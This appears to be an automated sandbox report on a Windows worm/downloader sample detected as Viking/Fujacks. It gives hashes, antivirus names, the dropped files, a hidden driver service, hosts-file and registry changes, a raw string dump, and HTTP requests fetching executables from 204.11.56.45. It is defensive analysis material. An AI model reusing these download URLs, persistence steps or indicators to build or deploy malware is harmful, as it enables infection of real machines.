Analysis Date2015-01-29 00:21:43
MD56303eab05304a67111db4479305d7965
SHA1aa96a652b620e7b28784c20b2df52aecd1227df5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8fc9113d6ab63b14cb54f4a81d1ff77c sha1: db40cdcb6329a99c256e170a5e0d9e9f1341c23c size: 98304
Section.rdata md5: 33397b43915259593649c7e7edff34cf sha1: fd0e41c136ac25c4b942e61f2a40aa187dea44f0 size: 8192
Section.data md5: 45e182c5245c448a34484025fa2b5a61 sha1: 121cf644ff39f37d01901500b8d847b5c52d5b00 size: 24576
Section.tc md5: a4f551f515279769d96704dcadeb2982 sha1: 2b84e8c9cdb80713f3392486b595d8f3e49e7862 size: 28672
Timestamp2001-02-06 17:24:20
PEhash2d884e4791cfc947bb516b304b957e9c40d517ac
IMPhashb6b88cf21086e32b4423fc877548ca42
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Viking-CF:Win32:Viking-CF
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Fileoutput
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates MutexDBWinMutex

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\DAV RPC SERVICE
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileNtHid
Creates FileC:\temp\files\Expor.exe
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\malware.exe
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\SHQB01QJ\desktop.ini
Creates FilePIPE\wkssvc
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KUS5ODTU\desktop.ini
Creates File\Device\Afd\Endpoint
Creates FileC:\temp\files\malware.exe
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\016I2MLR\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ODK9YH6J\desktop.ini
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS204.11.56.45
Winsock DNS192.168.1.1
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1876

Process
↳ Pid 1132

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSwww.baidu.com
Type: A
DNSnbtj.114anhui.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
/
:
/00-+ 
\
.
-E-0-0
. 00...........?-  
0
0 
0u
......

FILE
         (((((                  H
jjjjj
(null)
{ _^][
 0+020e0k0
0,0A0^0s0
%04d%02d%02d%02d%02d%02d
08101BB
0j/0@0E0R0f0
0T0X0\0`0d0h0l0p0t0x0|
1=>=F=
:1G1P1]1
1K1Z1h1
1#QNAN
1#SNAN
?%?2?]?
2(2B2N2W2c2n
2<2Q{h2p2
2?3H3Q
24_COLOR
2D2J2O2U2b1n2t2
>2>E>S>\>s>
2K2f2v2
2T2d2{2
3$30l3Xk
343=3B3j3p3|3
*37}Cg
;3D;H;L
@3T3e3
%4.1f%%  done
4&414]4
4%4+4G4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
5!6&6/6
)56Ab5t5
;!;+;5;?;C;J;
:5:F:Y:w:|:
6.6:6C6M6W6\6
6<6]6i6
6!71767D7R7^7i7p7
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
>!>*>8>B>H>V>`>
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e
-9;9A9F9
9ao^@q
9s4u2j
9.:U:p:}:
A3PLUS
A4J4Y4_4
A67-586
abnormal program termination
ABSTRACT
Action
ACTUAL
ADDRESS (%x) (%d,%d) (%x)
ADVAPI32.dll
AE4C57'
agX \s
a Play
appmgmts.dlld
Attempting to Connect to Server ...
Attempting to Start Server ...
August
BACK_CGM
BACK_WHITE
+BANNER
"bd	WVS
bgTLOkN
Bigband Parameters
BOTTOM
bPrintTo
bPrintToFile
bPrintToPrinter
bPrintToPrinterAndFile
browser
btHHt.
C1E870B0C
C4t,Pj
C4tUPj
CancelConne
Cannot allocate printers array
 cannot be run i
Cannot connect to server
Cannot create file bPrintTo
Cannot create file myFilename
Cannot create file myModel
Cannot create file myPlotter
Cannot create file myProfile
Cannot create home dir
Cannot create invisible window
Cannot open output file
CCRF Parameters
CENTER
Checking Server ...
client_cleanup: WSACleanup +++++++++++++++++++++++++
client_init: WSAStartup +++++++++++++++++++++++++
client: WSAAsyncSelect Failed %d (%d,%x)
CloseHandle
CompareStringA
CompareStringW
CONNECT_CAT
Connected to %s/%d
Connected to Server
CONNECT_EXECUTE
Connecting to Server
Connectivity
CONNECT_LEGACY
CONNECT_LP
CONNECT_LPR
CONNECT_NT
CONNECT_RENDER_EXECUTE
Copyro
could not establish home directory
Could not find status for job
Could not parse command line
Could not submit job
Could not submit job (A)
Could not submit job (B)
CP<Z<|<
CreateDirectoryA
CreateFileA
CreateProcessA
CreateThread
CreateWindowExA
crypt'c
CSHEET
CUSTOM
D0H0L0PM
D$0RPh
D$4RPh
DA-6D69-472e-8981-DBC71
@.data
dddd, MMMM dd, yyyy
Ddk h$
December
default
defaultprofiles
DefWindowProcA
DeleteCriticalSection
DeleteFileA
************* DeleteFile Failed %d :%s:
DeleteFile Failed %d :%s:
Density
DestroyWindow
(D/fc_oL
Did not provide a Plotter Name
dirty_definitions
Disconnect
Disconnected
Disconnected from %s/%d
DispatchMessageA
Disposition
D$$j|Pj
DOMAIN error
DOS mode.
Downloading File ...
Downloading Printer Definitions
Downloading %s ...
%d|%s|%d|%s|%s|%d
DSHEET
dU5 B~
&=,=D=v=
E8J8O8[8`8i8o8z8
Encrypted Password
EnterCriticalSection
ep1'*"/
eParam$
EPS Parameters
ERROR: identification failed
ERROR: no printers
ERROR: no printer specified
ERROR: no profile specified
ERROR: printer :%s: not found
ERROR: profile %s for printer :%s: not found
ERROR :%s:
ERROR: %s
ERROR: unexpected printer/profile error
ESHEET
Esht*6
ExecuUA
ExitProcess
ExitThread
Expor.exe
F??3@YAXP
Failed to Connect to Server
Failed to transfer bPrintTo
Failed to transfer cgmp file
Failed to transfer file to print
Failed to transfer models
Failed to transfer myFilename
Failed to transfer myModel
Failed to transfer myPlotter
Failed to transfer myProfile
Failed to transfer par file
Failed to transfer plotters
Failed to transfer profiles
Failed to transfer %s
f+D?	D
February
File Download Complete
File Download Failed
Filename (%s) must be last parameter
filesent %d
File transfer failed
File-Type
FindClose
FindFirstFileA
FindNextFileA
Finishing Submission ...
FIT_TO_PAGE
- floating point not loaded
FlushFileBuffers
F|Pj^j~h
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
FTh0TE
GAIsProcessorFeaturePresent
GERBER
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
getfile_inet %d %d %s
getfile_inet system %d %s
GetFileType
GetLastActivePopup
GetLastError
GetLocalTime
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetQueueStatus
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetTempPathA
GetUserNameA
GetVersion
GetVersionExA
__GLOBAL_HEAP_SELECTED
`h````
^<h0TE
h1l1.T
<HEAD>
Headers
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
_^][hhfE
HHtpHHtl
H:mm:ss
 hold 
HoldUntil
HPGL Parameters
HPPL Parameters
Hur3'$
identified
Identifying Ourselves (%s)
ident %s
iD&YomH
ifyTrLo
igVCRT
INCHES
InfGma
ingCompatibil
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IocSymd
IsWindow
i|tlh`
IXR-!m
_;i;z;
JanFebMarAprMayJunJulAugSepOctNovDec
January
j:h0TE
-jname
j"Pj"j"Qj"j"Rj"j"h
 -k 4/
kca:\lsa
KERNEL32
KERNEL32.dll
KERNEL32.DLL
KEveny
keyword=value
KillTimer
K:\Q.pdb`q
L5PFHP7b
LANDSCAPE
LCMapStringA
LCMapStringW
LeaveCriticalSection
LEDGER
LETTER
L$hhxiE
L$HhxiE
L$`hxiE
L$lhxiE
LoadCursorA
LoadLibraryA
lock_file
LockFile
LockFileEx
lp6a J
L$PhxiE
L$@PQh
L$<RPQhd
lstrcatA
L$$SUV
m1\U\Kcn
Max timeout reached for a transaction
M:d:m:
M/d/yy
MEDIUM
MessageBoxA
MFT Parameters
Microsoft Visual C++ Runtime Library
MILLIMETERS
Mirror Image
models
Monday
Monochrome
MONOCHROME
M<QRPhx
MsgWaitForMultipleObjects
MSN Gam
MSVCRT.dll
__MSVCRT_HEAP_SELECT
MultiByteToWideChar
myFilename
myModel
myPlotter
myProfile
(NEW) Job Name
(NEW) PrintMaster Profile Name
(NEW) Print to a file
No CGM file specified.
NO_COMPRESSION
No Error
Not Connected
Not connected to a server
Not Enough Parameters
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
NotProvided
November
 NT\Curr
NtQu9y
ntserv_exists: HOST (%s,%d) RET %d LASTERROR %d
(null)
Number of Copies
Nv`mG}
October
oft\Wud
o@P3e4
Op-;4$
~OPEN=-
OpenMutexA
OPEN_RASTER
+OpsSCM
|otB.8
out_profiles
output
OutputDebugStringA
,ov\A}
PALLETE_COLOR
PathFileExistsA
paused
PeekMessageA
PIXELS
placeHolder
PLOT_CFG
Plot Config File
Plot Length
plot_model_db_create:Calloc Failure A
plot_model_db_create:Calloc Failure B
Plotter Device
Plotter Model
Plotter Name
plotters
pm_api
@(#)pm_api 1.0003
Port Number
Port Num not provided
PORTRAIT
POSTSCRIPT
Postscript Parameters
PPPPPPPP
ppxxxx
Preparing Job for Submission
print_direct
Printer Definitions ...
Printer Models ...
Printer Profiles ...
/print_submit
Priority
Program: 
<program name unknown>
Project
PS_LINECAP_BUTT
PS_LINECAP_DEFAULT
PS_LINECAP_ROUND
PS_LINECAP_SQUARE
PS_LINEJOIN_BEVEL
PS_LINEJOIN_DEFAULT
PS_LINEJOIN_MITER
PS_LINEJOIN_ROUND
Pulse: |
Pulse: -
Pulse: /
Pulse: \
PULSE: %4.1f/%4.1f MB Transferred
Pulse: IDLE
Pulse: Stalled
- pure virtual function call
pVKwOf
P;Z;d;n;x;
q$A3<.
qidu.com
QQQQQQQ
QQSUVWj
QQSVW3
query all
Query Complete
query %d
Querying ...
Query Job
query_registry: e :%s:%s:
query_results
Queue Name
\Ra7207
RASTER
Raster Image Width
 `.rdat[
`.rdata
ReadFile
recieved
Reconnect
RECYCLER
RegCloseKey
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
Remote
Remote Host
Remote Host not provided
RemoveDirectoryA
Reprinting
Response: %s
ResumeThread
Retrieve File
_rju@_fd
-<RoA%'_h7
ROLL12
ROLL18
ROLL24
ROLL36
ROLL46
ROLL50
ROLL54
RPhdeE
RtlIoU
RtlUnwind
Running
runtime error 
Runtime Error!
S1[1`1m1
Saturday
%s/bPrintTo
%s/bpserver.exe -nogui -noservice
SCALE_ORIGINAL
SCALE_TO_PAGE
{schedsvc
SCSI_MONO
%s/defaultprofiles
SDI_BIN
SDI_JOBS
SDI_PLOT_CFG
SDI_SERVER_TYPE
%s Download Complete
%s Download Failed
SDPSRV
send file
sendfile_inet %d %d %d "%s"
Sending bPrintTo ...
Sending Command ...
Sending %s ...
September
Server Failed to Start
Server-Name
Server Paused
Server Running
Server Started
/session_*
SetCurrentDirectoryA
SetCurrentDirectoryW
SetEndOfFile
SetEnvironmentVariableA
SetFilePointer
SetHandleCount
SetLastError
SetStdHandle
SetTimer
SHELL32.dll
SHGetDesktopFolder
SHGetSpecialFolderLocation
SHLWAPI.dll
ShowWindow
SING error
%s/lock_file
%s/models
%s/myFilename
%s/myModel
%s/myPlotter
%s/myProfile
SOFTWARE\Mi
SOFTWARE\SDI
Sp`FFF
%s/plotters
    %s - %s
%s/%s_%d_%d_retrieve_lock
%s/sdi_nt_server_queue
%s/session_%d
    %s - %s (IGNORED, legacy support)
SS@SSPVSS
%s/submitted_jobs
%s/submitted_lock
%s/submitted_serial
Starting Server ...
Submission Complete ...
submit_hold
submit_nocopy %c%s%c %c%s%c %c%s%c %c%s%c %c%s%c %d
SubmittedLegacy
Submitter User Name
Submitting Job
Sub Queue
Sunday
SunMonTueWedThuFriSat
%s/userprofiles
 suspended
Suspended
s_/UYY
swsocknetman1ssdp
<System Profile>
t1h0TE
T$8j|Rj
.tcLCI0
TerminateProcess
.textVT
)< tF<	tB
_This #g
!This program cannot be run in DOS mode.
Thursday
Time Stamp
TLOSS error
TlsAlloc
TlsGetValue
TlsSetValue
tl`TDi
ToFilnH
+TRAILER
Trailers
TranslateMessage
t#SSUP
</t:<\t6<.t
+ttHHtd
T$thxiE
tTisrv
t.;t$$t(
Tuesday
t$$VSS
t/WWUPj
?%_#txg
u19~,t,
>"u:F@
	U;MhOy
uMpr.{
- unable to initialize heap
- unable to open console device
Unexpected Disconnect from Server
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UNIX or NT
UnlockFile
update
#upnphostKn&s
URLDown
usage: sdi_sp_pm ...
Use Default segy Parameter File
user32.dll
USER32.dll
User Name (same as -U)
UVWh`dE
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
VC20XC00U
VDS_BLOCK
v|htcL
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
VpRj~h
vThfad
VtRj~h
\v:.X$
W0YX0wx
|w9=trW
WaitingForFiles
WaitingToReprint
WaitingToRun
Wednesday
WideCharToMultiByte
 winsta0
WithTag	
Wj^j~h
WmdmPmSN'Fa
WO$_9E
Writea7
WriteFile
WSOCK32.dll
|$ WSP
wsprintfA
"WWSh8
<	=x=}=
/X,.CC
~xHtDHur
 X -ibcB"
<)<.<X<i<o
xmlpbS
{+xN{?ODBE
XPTPSW
XPVSSG
XRichS
xwuLEwE
XX; tg
/;%y;~;
yE>SCSI_COLOR
.y!GN&
|/Yr3Y
*y/.uzyzuEFz8GD
y%*+vp*vCpuC%
/YW'RB
_^][YY
ZERO_SIZE
@z}]u2o